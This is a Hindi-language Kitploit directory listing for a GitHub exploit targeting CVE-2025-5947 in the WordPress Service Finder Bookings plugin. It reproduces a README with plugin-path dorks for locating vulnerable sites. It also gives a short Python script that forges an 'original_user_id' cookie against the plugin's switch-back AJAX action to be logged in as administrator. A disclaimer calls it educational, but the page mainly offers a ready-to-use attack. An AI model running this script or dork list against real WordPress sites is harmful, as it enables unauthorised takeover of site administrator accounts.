Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-5947_Exploit — एक मिनी एक्सप्लॉइट जो Service Finder -Bookings प्लगइन WP के लिए है | Kitploit
उपकरण/GitHubGitHub/m4rgs/cve-2025-5947_exploit
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubm4rgs/cve-2025-5947_exploit

CVE-2025-5947_Exploit

एक मिनी एक्सप्लॉइट जो Service Finder -Bookings प्लगइन WP के लिए है

रिपॉजिटरी देखें
1611 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🔍 वर्डप्रेस प्लगइन एक्सप्लॉइट — सर्विस फाइंडर (sf-booking)

अवलोकन

Service Finder प्लगइन वर्डप्रेस के लिए एक बुकिंग और सेवा प्रबंधन प्रणाली है।
अपनी लोकप्रियता और जटिलता के कारण, कुछ संस्करणों में अनप्रमाणित AJAX एंडपॉइंट्स या अनुचित एक्सेस नियंत्रण से संबंधित सुरक्षा समस्याएँ रही हैं।

यह README बताता है कि शोधकर्ता कैसे सुरक्षित रूप से इंस्टॉलेशन की पहचान कर सकते हैं और नैतिक प्रथाओं का पालन कर सकते हैं (dbr krk)।


संवेदनशील WP dorks

/wp-content/plugins/service-finder/

/wp-content/plugins/service-finder-bookings/

/wp-content/plugins/sf-booking/


एक्सप्लॉइट वर्कफ़्लो

⚠️ अस्वीकरण:
ये खोजें केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए हैं। अनधिकृत पहुँच या शोषण का प्रयास न करें।

root@kitploit:~
import requests

url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
    'original_user_id': '1',
}

r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
  • 300-399: ✅ असुरक्षित! एडमिन पैनल पर एडमिन के रूप में रीडायरेक्ट
  • 400-499: ⚠️ क्लाइंट त्रुटि — अनुरोध अमान्य या अनधिकृत था, असुरक्षित नहीं

संदर्भ

  • WPScan प्लगइन डेटाबेस — https://wpscan.com/plugins/
  • राष्ट्रीय भेद्यता डेटाबेस (NVD) — https://nvd.nist.gov/
  • OWASP — Google Dorking / टोही तकनीकें
  • HackerOne प्रकटीकरण दिशानिर्देश — https://www.hackerone.com/disclosure-guidelines

लेखक

Taha Mounir


टूल डाउनलोड करें